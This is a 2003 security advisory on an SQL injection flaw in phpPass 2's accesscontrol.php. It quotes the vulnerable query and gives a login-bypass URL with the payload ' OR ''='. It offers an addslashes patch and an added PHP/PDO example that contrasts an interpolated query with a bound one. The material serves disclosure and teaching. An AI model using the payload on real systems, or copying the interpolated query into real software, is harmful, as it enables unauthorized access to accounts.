
phpPass SQL injection
20th Jan 2003 [SBWID-5937]
COMMAND

	phpPass SQL injection

SYSTEMS AFFECTED

	phpPass 2

PROBLEM

	Frog Man [leseulfrog@hotmail.com] found :
	
	 http://www.frog-man.org/tutos/phpPass.txt
	
	 PHP Code/Location :
	 °°°°°°°°°°°°°°°°°°°
	
	accesscontrol.php :
	------------------------------------------------
	[...]
	session_register("uid");
	session_register("pwd");
	[...]
	$sql = "SELECT * FROM user WHERE
	        userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	[...]
	if (mysql_num_rows($result) == 0) {
	  session_unregister("uid");
	  session_unregister("pwd");
	  ?>
	  <html>
	  <head>
	  <title> Access Denied </title>
	[...]
	  exit;
	[...]
	------------------------------------------------
	
	
	 Exploit :
	 °°°°°°°°°
	
	 http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
	
	

SOLUTION

	A patch can be found on http://www.phpsecure.org
	
	 Patch :
	 °°°°°°°
	
	In accesscontrol.php, replace the lines :
	
	-------------------------------------------------
	$sql = "SELECT * FROM user WHERE
	        userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	------------------------------------------------
	
	with :
	
	------------------------------------------------------------------------
	$uid=addslashes($uid);
	$pwd=addslashes($pwd);
	$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	------------------------------------------------------------------------
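
	Added example (not part of the advisory or of phpPass): the same lookup written with string interpolation and with bound parameters, run against an in-memory SQLite table through PDO. The function names, the sample row and the use of SQLite are assumptions; binding does not depend on addslashes() escaping matching the database connection's character set.

```php
<?php
// Added example, not phpPass code. Assumes the pdo_sqlite extension is loaded.
// The table mirrors the advisory's query; the row is constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (userid TEXT PRIMARY KEY, password TEXT)");
$db->exec("INSERT INTO user VALUES ('alice', 'constructed-sample-password')");

// Pattern from accesscontrol.php: values are pasted into the SQL text, so a
// quote character in the input changes the structure of the WHERE clause.
function rows_interpolated(PDO $db, string $uid, string $pwd): int
{
    $sql = "SELECT COUNT(*) FROM user WHERE userid = '$uid' AND password = '$pwd'";
    return (int) $db->query($sql)->fetchColumn();
}

// Hardened form: the SQL text is constant and the values are bound, so they
// are only ever compared as data, whatever characters they contain.
function rows_bound(PDO $db, string $uid, string $pwd): int
{
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM user WHERE userid = :uid AND password = :pwd"
    );
    $stmt->execute([':uid' => $uid, ':pwd' => $pwd]);
    return (int) $stmt->fetchColumn();
}

// Constructed inputs: one valid login, one wrong password, and the decoded
// uid/pwd value from the advisory's URL.
$cases = [
    'valid login'      => ['alice', 'constructed-sample-password'],
    'wrong password'   => ['alice', 'nope'],
    'advisory payload' => ["' OR ''='", "' OR ''='"],
];

foreach ($cases as $label => [$uid, $pwd]) {
    printf(
        "%-17s interpolated=%d bound=%d\n",
        $label,
        rows_interpolated($db, $uid, $pwd),
        rows_bound($db, $uid, $pwd)
    );
}
```

	A non-zero count is what accesscontrol.php treats as a successful login; for the advisory's payload only the interpolated query returns one.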
	
